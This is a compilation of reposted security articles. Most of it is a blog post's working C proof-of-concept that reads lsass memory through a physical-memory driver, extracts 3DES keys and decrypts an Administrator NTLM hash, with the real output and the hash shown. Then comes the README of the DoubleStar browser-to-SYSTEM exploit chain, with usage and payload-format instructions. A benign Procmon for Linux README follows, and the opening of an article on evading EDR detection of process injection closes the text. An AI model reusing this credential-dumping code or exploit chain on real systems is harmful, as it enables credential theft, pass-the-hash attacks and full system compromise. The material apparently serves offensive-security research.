reader.QuadPart = v2p(fileobject + 0x58 + 0x2); result = SetFilePointerEx(pmem_fd, reader, NULL, FILE_BEGIN); result = ReadFile(pmem_fd, &pathLen, 2, &bytes_read, NULL); //Get the pointer to the path name (offset 0x58 of _FILE_OBJECT is _UNICODE_STRING, the pointer to the buffer is +0x08) reader.QuadPart = v2p(fileobject + 0x58 + 0x8); filename = readPhysMemPointer(reader); //Save the path name path = (LPWSTR)malloc(pathLen * sizeof(wchar_t)); reader.QuadPart = v2p(filename); result = SetFilePointerEx(pmem_fd, reader, NULL, FILE_BEGIN); result = ReadFile(pmem_fd, path, pathLen * 2, &bytes_read, NULL); } } } /*printf("[0x%08llx]\n", currentNode); printf("[!] Subsection 0x%08llx\n", subsection); printf("[!] ControlArea 0x%08llx\n", control_area); printf("[!] FileObject 0x%08llx\n", fileobject); printf("[!] PathLen %d\n", pathLen); printf("[!] Buffer with path name 0x%08llx\n", filename); printf("[!] Path name: %S\n", path); */ // Save the info in our list vadList[count - 1].id = count - 1; vadList[count - 1].vaddress = currentNode; vadList[count - 1].start = start; vadList[count - 1].end = end; vadList[count - 1].size = end - start; memset(vadList[count - 1].image, 0, MAX_PATH); if (path != NULL) { wcstombs(vadList[count - 1].image, path, MAX_PATH); free(path); } count++; cursor++; } //Just print the VAD list printf("\t\t===================[VAD info]===================\n"); for (int i = 0; i < VadCount; i++) { printf("[%lld] (0x%08llx) [0x%08llx-0x%08llx] (%lld bytes)\n", vadList[i].id, vadList[i].vaddress, vadList[i].start, vadList[i].end, vadList[i].size); if (vadList[i].image[0] != 0) { printf(" |\n +---->> %s\n", vadList[i].image); } } printf("\t\t================================================\n"); for (int i = 0; i < VadCount; i++) { if (!strcmp(vadList[i].image, "\\Windows\\System32\\lsasrv.dll")) { // Is this our target? printf("[!] LsaSrv.dll found! [0x%08llx-0x%08llx] (%lld bytes)\n", vadList[i].start, vadList[i].end, vadList[i].size); // TODO lootLsaSrv(vadList[i].start, vadList[i].end, vadList[i].size); break; } } free(vadList); free(queue); return; } This looks like… (...) [161] (0xffffa48baf677ba0) [0x7ff8122b0000-0x7ff8122e0000] (196608 bytes) | +---->> \Windows\System32\CertPolEng.dll [162] (0xffffa48bb1f640a0) [0x7ff8183e0000-0x7ff818422000] (270336 bytes) | +---->> \Windows\System32\ngcpopkeysrv.dll [163] (0xffffa48bb1f63ce0) [0x7ff83df10000-0x7ff83df2a000] (106496 bytes) | +---->> \Windows\System32\tbs.dll [164] (0xffffa48bb1f66a80) [0x7ff83e270000-0x7ff83e2e3000] (471040 bytes) | +---->> \Windows\System32\cryptngc.dll ================================================ [!] LsaSrv.dll found! [0x7ff845130000-0x7ff8452ce000] (1695744 bytes) To recap at this point we: Can translate virtual addresses to physical Got the location of the LsaSrv.dll module inside the lsass process memory Stray Mimikatz sings Runnaway Boys This time we are only interested in retrieving NTLM Hashes, so we are going to implement something like the sekurlsa::msv from Mimikatz as PoC (once we have located the process memory, and its modules, it is trivial to imitate any functionatility from Mimikatz so I picked the quickier to implement as PoC). This is well explained in the article “Uncovering Mimikatz ‘msv’ and collecting credentials through PyKD” from Matteo Malvica, so it is redundant to explain it again here… but in essence we are going to search for signatures inside lsasrv.dll and then retrieve the info needed to locate the LogonSessionList struct and the crypto keys/IVs needed. 
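
(One small gap in the listing above: the VAD type used by walkAVL() is not defined in the excerpt. Judging by the field accesses, it is presumably something along these lines.)

#include <windows.h>

typedef struct _VAD {
    ULONGLONG id;               // index in discovery order
    ULONGLONG vaddress;         // virtual address of the _MMVAD node itself
    ULONGLONG start;            // start of the described region
    ULONGLONG end;              // end of the described region
    ULONGLONG size;             // end - start
    char      image[MAX_PATH];  // backing image path, if the VAD maps a file
} VAD;
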
Also another good related article to read is “Exploring Mimikatz - Part 1 - WDigest” by @xpn. As I am imitating the post from Matteo Malvica, I am going to retrieve only the cryptoblob encrypted with Triple-DES. Here is our shitty code: void lootLsaSrv(ULONGLONG start, ULONGLONG end, ULONGLONG size) { LARGE_INTEGER reader; DWORD bytes_read = 0; LPSTR lsasrv = NULL; ULONGLONG cursor = 0; ULONGLONG lsasrv_size = 0; ULONGLONG original = 0; BOOL result; ULONGLONG LogonSessionListCount = 0; ULONGLONG LogonSessionList = 0; ULONGLONG LogonSessionList_offset = 0; ULONGLONG LogonSessionListCount_offset = 0; ULONGLONG iv_offset = 0; ULONGLONG hDes_offset = 0; ULONGLONG DES_pointer = 0; unsigned char* iv_vector = NULL; unsigned char* DES_key = NULL; KIWI_BCRYPT_HANDLE_KEY h3DesKey; KIWI_BCRYPT_KEY81 extracted3DesKey; LSAINITIALIZE_NEEDLE LsaInitialize_needle = { 0x83, 0x64, 0x24, 0x30, 0x00, 0x48, 0x8d, 0x45, 0xe0, 0x44, 0x8b, 0x4d, 0xd8, 0x48, 0x8d, 0x15 }; LOGONSESSIONLIST_NEEDLE LogonSessionList_needle = { 0x33, 0xff, 0x41, 0x89, 0x37, 0x4c, 0x8b, 0xf3, 0x45, 0x85, 0xc0, 0x74 }; PBYTE LsaInitialize_needle_buffer = NULL; PBYTE needle_buffer = NULL; int offset_LsaInitialize_needle = 0; int offset_LogonSessionList_needle = 0; ULONGLONG currentElem = 0; original = start; /* Save the whole region in a buffer */ lsasrv = (LPSTR)malloc(size); while (start < end) { DWORD bytes_read = 0; DWORD bytes_written = 0; CHAR tmp = NULL; reader.QuadPart = v2p(start); result = SetFilePointerEx(pmem_fd, reader, NULL, FILE_BEGIN); result = ReadFile(pmem_fd, &tmp, 1, &bytes_read, NULL); lsasrv[cursor] = tmp; cursor++; start = original + cursor; } lsasrv_size = cursor; // Use mimikatz signatures to find the IV/keys printf("\t\t===================[Crypto info]===================\n"); LsaInitialize_needle_buffer = (PBYTE)malloc(sizeof(LSAINITIALIZE_NEEDLE)); memcpy(LsaInitialize_needle_buffer, &LsaInitialize_needle, sizeof(LSAINITIALIZE_NEEDLE)); offset_LsaInitialize_needle = memmem((PBYTE)lsasrv, lsasrv_size, LsaInitialize_needle_buffer, sizeof(LSAINITIALIZE_NEEDLE)); printf("[*] Offset for InitializationVector/h3DesKey/hAesKey is %d\n", offset_LsaInitialize_needle); memcpy(&iv_offset, lsasrv + offset_LsaInitialize_needle + 0x43, 4); //IV offset printf("[*] IV Vector relative offset: 0x%08llx\n", iv_offset); iv_vector = (unsigned char*)malloc(16); memcpy(iv_vector, lsasrv + offset_LsaInitialize_needle + 0x43 + 4 + iv_offset, 16); printf("\t\t[/!\\] IV Vector: "); for (int i = 0; i < 16; i++) { printf("%02x", iv_vector[i]); } printf(" [/!\\]\n"); free(iv_vector); memcpy(&hDes_offset, lsasrv + offset_LsaInitialize_needle - 0x59, 4); //DES KEY offset printf("[*] 3DES Handle Key relative offset: 0x%08llx\n", hDes_offset); reader.QuadPart = v2p(original + offset_LsaInitialize_needle - 0x59 + 4 + hDes_offset); DES_pointer = readPhysMemPointer(reader); printf("[*] 3DES Handle Key pointer: 0x%08llx\n", DES_pointer); reader.QuadPart = v2p(DES_pointer); result = SetFilePointerEx(pmem_fd, reader, NULL, FILE_BEGIN); result = ReadFile(pmem_fd, &h3DesKey, sizeof(KIWI_BCRYPT_HANDLE_KEY), &bytes_read, NULL); reader.QuadPart = v2p((ULONGLONG)h3DesKey.key); result = SetFilePointerEx(pmem_fd, reader, NULL, FILE_BEGIN); result = ReadFile(pmem_fd, &extracted3DesKey, sizeof(KIWI_BCRYPT_KEY81), &bytes_read, NULL); DES_key = (unsigned char*)malloc(extracted3DesKey.hardkey.cbSecret); memcpy(DES_key, extracted3DesKey.hardkey.data, extracted3DesKey.hardkey.cbSecret); printf("\t\t[/!\\] 3DES Key: "); for (int i = 0; i < 
extracted3DesKey.hardkey.cbSecret; i++) { printf("%02x", DES_key[i]); } printf(" [/!\\]\n"); free(DES_key); printf("\t\t================================================\n"); needle_buffer = (PBYTE)malloc(sizeof(LOGONSESSIONLIST_NEEDLE)); memcpy(needle_buffer, &LogonSessionList_needle, sizeof(LOGONSESSIONLIST_NEEDLE)); offset_LogonSessionList_needle = memmem((PBYTE)lsasrv, lsasrv_size, needle_buffer, sizeof(LOGONSESSIONLIST_NEEDLE)); memcpy(&LogonSessionList_offset, lsasrv + offset_LogonSessionList_needle + 0x17, 4); printf("[*] LogonSessionList Relative Offset: 0x%08llx\n", LogonSessionList_offset); LogonSessionList = original + offset_LogonSessionList_needle + 0x17 + 4 + LogonSessionList_offset; printf("[*] LogonSessionList: 0x%08llx\n", LogonSessionList); reader.QuadPart = v2p(LogonSessionList); printf("\t\t===================[LogonSessionList]==================="); while (currentElem != LogonSessionList) { if (currentElem == 0) { currentElem = LogonSessionList; } reader.QuadPart = v2p(currentElem); currentElem = readPhysMemPointer(reader); //printf("Element at: 0x%08llx\n", currentElem); USHORT length = 0; LPWSTR username = NULL; ULONGLONG username_pointer = 0; reader.QuadPart = v2p(currentElem + 0x90); //UNICODE_STRING = USHORT LENGHT USHORT MAXLENGTH LPWSTR BUFFER result = SetFilePointerEx(pmem_fd, reader, NULL, FILE_BEGIN); result = ReadFile(pmem_fd, &length, 2, &bytes_read, NULL); //Read Lenght Field username = (LPWSTR)malloc(length + 2); memset(username, 0, length + 2); reader.QuadPart = v2p(currentElem + 0x98); username_pointer = readPhysMemPointer(reader); //Read LPWSTR reader.QuadPart = v2p(username_pointer); result = SetFilePointerEx(pmem_fd, reader, NULL, FILE_BEGIN); result = ReadFile(pmem_fd, username, length, &bytes_read, NULL); //Read string at LPWSTR wprintf(L"\n[+] Username: %s \n", username); free(username); ULONGLONG credentials_pointer = 0; reader.QuadPart = v2p(currentElem + 0x108); credentials_pointer = readPhysMemPointer(reader); if (credentials_pointer == 0) { printf("[+] Cryptoblob: (empty)\n"); continue; } printf("[*] Credentials Pointer: 0x%08llx\n", credentials_pointer); ULONGLONG primaryCredentials_pointer = 0; reader.QuadPart = v2p(credentials_pointer + 0x10); primaryCredentials_pointer = readPhysMemPointer(reader); printf("[*] Primary credentials Pointer: 0x%08llx\n", primaryCredentials_pointer); USHORT cryptoblob_size = 0; reader.QuadPart = v2p(primaryCredentials_pointer + 0x18); result = SetFilePointerEx(pmem_fd, reader, NULL, FILE_BEGIN); result = ReadFile(pmem_fd, &cryptoblob_size, 4, &bytes_read, NULL); if (cryptoblob_size % 8 != 0) { printf("[*] Cryptoblob size: (not compatible with 3DEs, skipping...)\n"); continue; } printf("[*] Cryptoblob size: 0x%x\n", cryptoblob_size); ULONGLONG cryptoblob_pointer = 0; reader.QuadPart = v2p(primaryCredentials_pointer + 0x20); cryptoblob_pointer = readPhysMemPointer(reader); //printf("Cryptoblob pointer: 0x%08llx\n", cryptoblob_pointer); unsigned char* cryptoblob = (unsigned char*)malloc(cryptoblob_size); reader.QuadPart = v2p(cryptoblob_pointer); result = SetFilePointerEx(pmem_fd, reader, NULL, FILE_BEGIN); result = ReadFile(pmem_fd, cryptoblob, cryptoblob_size, &bytes_read, NULL); printf("[+] Cryptoblob:\n"); for (int i = 0; i < cryptoblob_size; i++) { printf("%02x", cryptoblob[i]); } printf("\n"); } printf("\t\t================================================\n"); free(needle_buffer); free(lsasrv); } If you wonder why I am not calling windows API to decrypt the info… It was 4:00 AM when we wrote this . 
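
The KIWI_BCRYPT_HANDLE_KEY / KIWI_BCRYPT_KEY81 definitions the code reads into are not part of the excerpt either; they presumably mirror the structures published in the Mimikatz sekurlsa headers. The sketch below is reproduced from memory, so double-check it against the original Mimikatz source; only the fields the PoC actually touches (key, hardkey.cbSecret, hardkey.data) matter here, and data[] is given a fixed size so a single read grabs the key bytes:

#include <windows.h>

typedef struct _KIWI_HARD_KEY {
    ULONG cbSecret;                 // length of the key material
    BYTE  data[32];                 // ANYSIZE_ARRAY in Mimikatz; fixed here for a one-shot read
} KIWI_HARD_KEY;

typedef struct _KIWI_BCRYPT_KEY81 {
    ULONG size;
    ULONG tag;                      // 'MSSK'
    ULONG type;
    ULONG unk0;
    ULONG unk1;
    ULONG unk2;
    ULONG unk3;
    ULONG unk4;
    PVOID unk5;                     // aligned on x64
    ULONG unk6;
    ULONG unk7;
    ULONG unk8;
    ULONG unk9;
    KIWI_HARD_KEY hardkey;          // cbSecret + raw key material (the 3DES key we print)
} KIWI_BCRYPT_KEY81;

typedef struct _KIWI_BCRYPT_HANDLE_KEY {
    ULONG size;
    ULONG tag;                      // 'UUUR'
    PVOID hAlgorithm;
    PVOID key;                      // -> KIWI_BCRYPT_KEY81 (virtual address inside lsass)
    PVOID unk0;
} KIWI_BCRYPT_HANDLE_KEY;
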
Anyway, fire in the hole! [!] LsaSrv.dll found! [0x7ff845130000-0x7ff8452ce000] (1695744 bytes) ===================[Crypto info]=================== [*] Offset for InitializationVector/h3DesKey/hAesKey is 305033 [*] IV Vector relative offset: 0x0013be98 [/!\] IV Vector: d2e23014c6608529132d0f21144ee0df [/!\] [*] 3DES Handle Key relative offset: 0x0013bf4c [*] 3DES Handle Key pointer: 0x1d4d3610000 [/!\] 3DES Key: 46bca8b85491846f5c7fb42700287d0437c49c15e7b76280 [/!\] ================================================ [*] LogonSessionList Relative Offset: 0x0012b0f1 [*] LogonSessionList: 0x7ff8452b52a0 ===================[LogonSessionList]=================== [+] Username: Administrador [*] Credentials Pointer: 0x1d4d3ba96c0 [*] Primary credentials Pointer: 0x1d4d3ae49f0 [*] Cryptoblob size: 0x1b0 [+] Cryptoblob: f0e368d8302af9bbcd247687552e8207d766e674c99a61907e78a173d5e4d475df165ec1fcba3b5d3463f8bd7ce5fa6457d043147dcf26a6e03ec12d1216d57953a7f4cbdcaeec2c6a27787c332db706a5287a77957d09d546590d7f32a117f69d983290c01b1ad83cf66916ee76314c17605518a17d7ea9db2de530b1298e5178fcc638e1ae106542dcb46e37a09943dd10e3e2f15a99b93989361aa3a6e6ed8e98aab5578712bcf0f9e5a5372542f61a9032bf5d110278253c4f602107a02bf2cfe07fae7f81a4dee6440a596278e7c06eee06de5aa7f705bd6132dea0327ad869eca5da1538e098edfefcd050dd6e36a0a3196cdf5ee6786d0b62a3d526981f6c4fc503d43238887cf6f3c51cca01b912194242d7e5a76522aaf791c467ea6035a06219ea2aafc2860e6db56ddb77936871316e3f18fd9b1425f948c925171829e460cf7c31f9a0396705bcb1bfd0055b25de160cf816472180270f36e9224868d1377349f7bb001e7edfe52dbd1915a70fb686f850086732c57ba26423f7a3691ddb9b23b5f2166a56ee82d30571ffb79b222e707f6dc2cc5f986723d99229345b2d0b97371abb1573f59efecd6a Let’s decrypt with python (yeah, we know, we are the worst ) >>> from pyDes import * >>> k = triple_des("46bca8b85491846f5c7fb42700287d0437c49c15e7b76280".decode("hex"), CBC, "\x00\x0d\x56\x99\x63\x93\x95\xd0") >>> k.decrypt("f0e368d8302af9bbcd247687552e8207d766e674c99a61907e78a173d5e4d475df165ec1fcba3b5d3463f8bd7ce5fa6457d043147dcf26a6e03ec12d1216d57953a7f4cbdcaeec2c6a27787c332db706a5287a77957d09d546590d7f32a117f69d983290c01b1ad83cf66916ee76314c17605518a17d7ea9db2de530b1298e5178fcc638e1ae106542dcb46e37a09943dd10e3e2f15a99b93989361aa3a6e6ed8e98aab5578712bcf0f9e5a5372542f61a9032bf5d110278253c4f602107a02bf2cfe07fae7f81a4dee6440a596278e7c06eee06de5aa7f705bd6132dea0327ad869eca5da1538e098edfefcd050dd6e36a0a3196cdf5ee6786d0b62a3d526981f6c4fc503d43238887cf6f3c51cca01b912194242d7e5a76522aaf791c467ea6035a06219ea2aafc2860e6db56ddb77936871316e3f18fd9b1425f948c925171829e460cf7c31f9a0396705bcb1bfd0055b25de160cf816472180270f36e9224868d1377349f7bb001e7edfe52dbd1915a70fb686f850086732c57ba26423f7a3691ddb9b23b5f2166a56ee82d30571ffb79b222e707f6dc2cc5f986723d99229345b2d0b97371abb1573f59efecd6a".decode("hex"))[74:90].encode("hex") '191d643eca7a6b94a3b6df1469ba2846' We can check that effectively the Administrador’s NTLM hash is 191d643eca7a6b94a3b6df1469ba2846: C:\Windows\system32>C:\Users\ortiga.japonesa\Downloads\mimikatz-master\mimikatz-master\x64\mimikatz.exe .#####. mimikatz 2.2.0 (x64) #19041 May 8 2021 00:30:53 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > https://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > https://pingcastle.com / https://mysmartlogon.com ***/ mimikatz # sekurlsa::msv [!] LogonSessionListCount: 0x7ff8452b4be0 [!] LogonSessionList: 0x7ff8452b52a0 [!] 
Data Address: 0x1d4d3bfb5c0
Authentication Id : 0 ; 120327884 (00000000:072c0ecc)
Session           : CachedInteractive from 1
User Name         : Administrador
Domain            : ACUARIO
Logon Server      : WIN-UQ1FE7E6SES
Logon Time        : 08/05/2021 0:44:32
SID               : S-1-5-21-3039666266-3544201716-3988606543-500
        msv :
         [00000003] Primary
         * Username : Administrador
         * Domain   : ACUARIO
         * NTLM     : 191d643eca7a6b94a3b6df1469ba2846
         * SHA1     : 5f041d6e1d3d0b3f59d85fa7ff60a14ae1a5963d
         * DPAPI    : b4772e37b9a6a10785ea20641c59e5b2

MMmm… that PtH smell…

EoF

Playing with Windows Internals and reading Mimikatz code is a nice exercise to learn and practice new things. As we said at the beginning, this approach is probably not the best (our knowledge of this topic is limited), so if you spot errors/misconceptions/typos please contact us so we can fix them. The code can be found in our repo as SnoopyOwl. We hope you enjoyed this reading! Feel free to give us feedback on our Twitter @AdeptsOf0xCC.

updated_at 08-05-2021

Sursa: https://adepts.of0x.cc/physical-graffiti-lsass/
  2. DoubleStar

Windows 8.1 IE/Firefox RCE -> Sandbox Escape -> SYSTEM EoP Exploit Chain

[ASCII diagram: a Remote PAC file served over HTTPS feeds svchost.exe; firefox.exe talks to svchost.exe over RPC/ALPC, svchost.exe talks to spoolsv.exe over RPC/ALPC, and spoolsv.exe connects back over RPC/Pipe to malware.exe, which executes impersonating NT AUTHORITY\SYSTEM]

~ Usage

To run this exploit chain, download the full release/folder structure to an unpatched Windows 8.1 x64 machine and load either of these two .html files while connected to the internet:

- CVE-2019-17026\Forrest_Orr_CVE-2019-17026_64-bit.html - via Firefox v65-69 64-bit.
- CVE-2020-0674\Forrest_Orr_CVE-2020-0674_64-bit.html - via Internet Explorer 11 64-bit (Enhanced Protected Mode enabled).

The initial RCE may be run through either IE or FF, and will result in the execution of a cmd.exe process in your user session with NT AUTHORITY\SYSTEM privileges. The individual exploits have been successfully tested in the following contexts:

- CVE-2020-0674 - IE8 64-bit and WPAD on Windows 7 x64, IE11 64-bit and WPAD on Windows 8.1 x64.
- CVE-2019-17026 - Firefox 65-69 (64-bit) on Windows 7, 8.1 and 10 x64.

Note that while the individual exploits themselves may work on multiple versions of Windows, the full chain will only work on Windows 8.1.

~ Overview

While this exploit chain makes use of two (now patched) 0day exploits, it also contains a sandbox escape and EoP technique which are still, as of 5/4/2021, not patched, and remain feasible for integration into future attack chains today. The Darkhotel APT group (believed to originate from South Korea) launched a campaign against Chinese and Japanese business executives and government officials through a combination of spear phishing and hacking of luxury hotel networks in early 2020. The exploits they used (CVE-2020-0674 and CVE-2019-17026, together dubbed "Double Star") were slight 0day variations of old/existing exploits from 2019: specifically UAF bugs in the legacy JavaScript engine (jscript.dll) and aliasing bugs in the Firefox IonMonkey engine. What made the use of these 0days interesting went beyond their ability to achieve RCE through the Internet Explorer and Firefox web browsers: CVE-2020-0674 in particular (a UAF in the legacy jscript.dll engine) is exploitable in any process in which legacy JS code can be executed via jscript.dll.

In late 2017, Google Project Zero released a blog post entitled "aPAColypse now: Exploiting Windows 10 in a Local Network with WPAD/PAC and JScript" [1]. This research brought to light a very interesting attack vector which (at the time) affected all versions of Windows from 7 onward: the WPAD service (or "WinHTTP Web Proxy Auto-Discovery Service") contains an ancient piece of functionality for updating proxy configurations via a "PAC" file. Any user who can speak to the WPAD service (running within an svchost.exe process as LOCAL SERVICE) over RPC can coerce it into downloading a PAC file from a remote URL containing JS code which is responsible for setting the correct proxy configuration for a user-supplied URL.
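
As an illustration (not part of the DoubleStar repository), one way to exercise that PAC-fetch code path from an unprivileged process is the documented WinHTTP API below. The URL is a placeholder, whether the PAC ends up being evaluated in-process or inside the WinHTTP auto-proxy svchost depends on the Windows version, and the actual chain talks to the service directly over RPC/ALPC rather than through this API:

#include <windows.h>
#include <winhttp.h>
#pragma comment(lib, "winhttp.lib")

int main(void)
{
    HINTERNET hSession = WinHttpOpen(L"pac-demo", WINHTTP_ACCESS_TYPE_NO_PROXY,
                                     WINHTTP_NO_PROXY_NAME, WINHTTP_NO_PROXY_BYPASS, 0);
    if (!hSession) return 1;

    WINHTTP_AUTOPROXY_OPTIONS opts = { 0 };
    opts.dwFlags = WINHTTP_AUTOPROXY_CONFIG_URL;                   // explicit PAC URL, no DHCP/DNS discovery
    opts.lpszAutoConfigUrl = L"http://attacker.example/wpad.dat";  // placeholder URL
    WINHTTP_PROXY_INFO info = { 0 };

    // Forces download and JScript evaluation of the PAC to answer "which proxy for this URL?"
    // (cleanup of the strings returned in `info` omitted for brevity)
    WinHttpGetProxyForUrl(hSession, L"http://www.example.com/", &opts, &info);

    WinHttpCloseHandle(hSession);
    return 0;
}
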
Most notably, the legacy jscript.dll engine is used to parse these PAC files. This opened up an attack vector wherein any process (regardless of limited user privileges or even sandboxing) could connect to the local WPAD service over ALPC and coerce it into downloading a malicious PAC file containing a jscript.dll exploit from a remote URL. This would result in code execution in the context of LOCAL SERVICE. Darkhotel took this concept and used it as their sandbox escape after they obtained RCE via Firefox or Internet Explorer.

The next step in their attack chain is unclear: it appears that they somehow elevated their privileges from LOCAL SERVICE to SYSTEM and proceeded to execute their malware from this context. In all of the analysis of the Darkhotel Double Star attack chain, I was not able to find a detailed explanation of how they achieved this, however it is safe to assume that their technique need not have been a 0day exploit. Processes launched by the LOCAL SERVICE account are provided with the SeImpersonate privilege by default and thus can elevate their security context in the event they can coerce a privileged connection to themselves via named pipes or ALPC. It is likely that the Darkhotel APT group used Rotten Potato for their EoP from LOCAL SERVICE, as this was the simplest and most common technique in widespread use several years ago (as well as the technique used in the Google Project Zero "aPAColypse now" research), however I settled on a more robust/modern technique instead: named pipe impersonation of a coerced RPC connection from the Print Spooler [2]. This technique combined an old RPC interface popular among Red Teamers for TGT harvesting in environments with unconstrained delegation enabled (aka the "Printer Bug") with an impersonation/Rotten Potato style attack adapted for local privilege escalation. Additionally, rather than targeting Windows 7, I decided to focus on Windows 8.1 due to the challenge presented by its enhanced security mitigations such as non-deterministic LFH, high entropy ASLR and Control Flow Guard (CFG).

~ CVE-2020-0674

Malicious PAC file containing the CVE-2020-0674 UAF exploit - downloaded into the WPAD service svchost.exe (LOCAL SERVICE) via RPC trigger. Contains the stage three shellcode (Spool Potato EoP). This exploit may serve a dual purpose as an initial RCE attack vector through IE11 64-bit as well.

[ASCII diagram: firefox.exe --RPC--> svchost.exe --CVE-2020-0674--> Spool Potato shellcode]

~ CVE-2019-17026

Firefox 64-bit IonMonkey JIT/Type Confusion RCE. Represents the initial attack vector when a user visits an infected web page with a vulnerable version of Firefox. This component contains a stage one (egg hunter) and stage two (WPAD sandbox escape) shellcode, the latter of which is only effective on Windows 8.1 due to hardcoded RPC IDL interface details for WPAD.

[ASCII diagram: firefox.exe --JIT spray--> Egg hunter shellcode --DEP bypass--> WPAD sandbox escape shellcode (heap)]

~ Payloads

This exploit chain has three shellcode payloads, found within this repository under Payloads\Compiled\JS in their JavaScript encoded shellcode form:

- Stage one: egg hunter shellcode (ASM).
- Stage two: WPAD sandbox escape shellcode (C DLL, sRDI to shellcode).
- Stage three: Spool Potato privilege escalation shellcode (C DLL, sRDI to shellcode). When IE is used as the initial RCE attack vector, only the stage two and three shellcodes are needed. When FF is used as the initial RCE attack vector, all three are used. I've also included several additional shellcodes for testing purposes (a MessageBoxA and WinExec shellcode). Note when using these that in the case of Firefox CVE-2019-17026, the shellcode should be represented as a Uint8Array prefixed by the following egg QWORD: 0x8877665544332211. In the case of CVE-2020-0674, the shellcode should be represented as a DWORD array. Also note that when using a WinExec or MessageBoxA payload in conjunction with Firefox CVE-2019-17026, you must adjust the sandbox content level in the "about:config" down to 2 first. ~ Credits maxpl0it - for writing the initial analysis and PoC for CVE-2019-17026 with a focus on the Linux OS, and for writing the initial analysis and PoC for CVE-2020-0674 with a focus on IE8/11 on Windows 7 x64. 0vercl0k - for documenting IonMonkey internals in relation to aliasing and the GVN. HackSys Team - for tips on the WPAD service and low level JS debugging. itm4n - for the original research on combining the RPC printer bug with named pipe impersonation. ~ Links [1] https://googleprojectzero.blogspot.com/2017/12/apacolypse-now-exploiting-windows-10-in_18.html [2] https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/ Sursa: https://github.com/forrest-orr/DoubleStar
  3. Process Monitor for Linux (Preview) Process Monitor (Procmon) is a Linux reimagining of the classic Procmon tool from the Sysinternals suite of tools for Windows. Procmon provides a convenient and efficient way for Linux developers to trace the syscall activity on the system. Installation & Usage Requirements OS: Ubuntu 18.04 lts cmake >= 3.14 (build-time only) libsqlite3-dev >= 3.22 (build-time only) Install Procmon Checkout our install instructions for distribution specific steps to install Procmon. Building Procmon from source 1. Install build dependencies sudo apt-get -y install bison build-essential flex git libedit-dev \ libllvm6.0 llvm-6.0-dev libclang-6.0-dev python zlib1g-dev libelf-dev 2. Build Procmon git clone https://github.com/Microsoft/Procmon-for-Linux cd Procmon-for-Linux mkdir build cd build cmake .. make Building Procmon Packages The distribution packages for Procmon for Linux are constructed utilizing cpack. To build a deb package of Procmon on Ubuntu simply run: cd build cpack .. Usage Usage: procmon [OPTIONS] OPTIONS -h/--help Prints this help screen -p/--pids Comma separated list of process ids to monitor -e/--events Comma separated list of system calls to monitor -c/--collect [FILEPATH] Option to start Procmon in a headless mode -f/--file FILEPATH Open a Procmon trace file Examples The following traces all processes and syscalls on the system sudo procmon The following traces processes with process id 10 and 20 sudo procmon -p 10,20 The following traces process 20 only syscalls read, write and openat sudo procmon -p 20 -e read,write,openat The following traces process 35 and opens Procmon in headless mode to output all captured events to file procmon.db sudo procmon -p 35 -c procmon.db The following opens a Procmon tracefile, procmon.db, within the Procmon TUI sudo procmon -f procmon.db Feedback Ask a question on StackOverflow (tag with ProcmonForLinux) Request a new feature on GitHub Vote for popular feature requests File a bug in GitHub Issues Contributing If you are interested in fixing issues and contributing directly to the code base, please see the document How to Contribute, which covers the following: How to build and run from source The development workflow, including debugging and running tests Coding Guidelines Submitting pull requests Please see also our Code of Conduct. License Copyright (c) Microsoft Corporation. All rights reserved. Licensed under the MIT License. Sursa: https://github.com/Sysinternals/ProcMon-for-Linux/
  4. Bypassing EDR real-time injection detection logic This is not really about suppressing/bypassing event collection, and more on understanding EDR architecture design flaws, lazy detection logic and correlation to minimize chance of triggering alerts with events that are (at least partially) collected. Some great posts on bypassing EDR agent collection: Red Team Tactics: Combining Direct System Calls and sRDI to bypass AV/EDR (outflank) A tale of EDR bypass methods (@s3cur3th1ssh1t) FireWalker: A New Approach to Generically Bypass User-Space EDR Hooking (mdsec) Hell's Gate (@smelly__vx, @am0nsec) Halo's Gate - twin sister of Hell's Gate (sektor7) Another method of bypassing ETW and Process Injection via ETW registration (@modexpblog) Data Only Attack: Neutralizing EtwTi Provider (@slaeryan, kernel mode) Introduction In the previous post we discussed how solutions which use reliable, kernel-based sources for remote memory allocation events can use these to identify many of the in-the-wild injections with relative ease, regardless of the specific technique used, and without worrying that the event source is trivial to bypass from the usermode. Most notably Microsoft uses that ETW, though there are vendors who do it better. Today I wanted to share how easy it is to bypass any memory allocation-based logic. We will also bypass thread initialization alerting, which combined give us a technique undetectable by MDATP and many other EDRs out there, as of today. It is important to expose detection gaps like this, not only to force security vendors to improve defenses, but primarily to build awareness around inherent limitations of these solutions and the need for in-house security R&D programs, or at least use of well-engineered managed detection services for more complete coverage. Check out my previous post on detecting process injection with kernel ETW. T1055 vs EDR Let's first take a look at what independent evaluations can tell us about process injections, and if there is even anything to bypass. It's definitely good to know the product you're using is not able to flag Meterpreter's migrate command and process hollowing procedures from a 5+ year old Carbanak malware available on GitHub, even with prior knowledge of what is going to be tested, and half a year to prepare if needed. Other than that value of the last evaluation in context of injections is very limited, and we are not getting the full picture of how much each vendor invests into researching TTPs relevant right now, and in the future, or how robust the detection capability and data sources really are. https://ela.st/mitre-round3 While some EDRs were not able to flag on the elementary techniques, many improved detection capability to the point that today, it is not uncommon for process injection to be considered OPSEC-expensive by red teams. Experienced operators tend to tailor detection bypasses per-solution, and in some environments they choose to avoid injecting altogether, as the very limited set of APIs Windows exposes for memory and thread management are under close surveillance. We are going to talk about bypassing the mature solutions today - for the ones with T1055 misses here just use APC injection and you'll probably be fine. Let's first discuss all the detection opportunities for anomalous remote thread creation. CRT anomalies The API getting most attention has to be kernel32!CreateRemoteThread, but we are really talking about ntdll!NtCreateThreadEx, or the kernel mode target intercepted through kernel callbacks. 
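
For context, the baseline all of these detections are built around is the textbook remote-thread injection below (a minimal sketch of our own with a hypothetical target PID and payload, error handling mostly elided). Each call ends up in an Nt* syscall (NtOpenProcess, NtAllocateVirtualMemory, NtWriteVirtualMemory, NtCreateThreadEx) that userland hooks, the EtwTi provider and kernel callbacks can observe:

#include <windows.h>

BOOL ClassicRemoteThreadInjection(DWORD pid, const unsigned char *payload, SIZE_T len)
{
    HANDLE hProc = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE,
                               FALSE, pid);
    if (!hProc) return FALSE;

    // Remote RWX allocation - the "remote memory allocation" event discussed in the previous post
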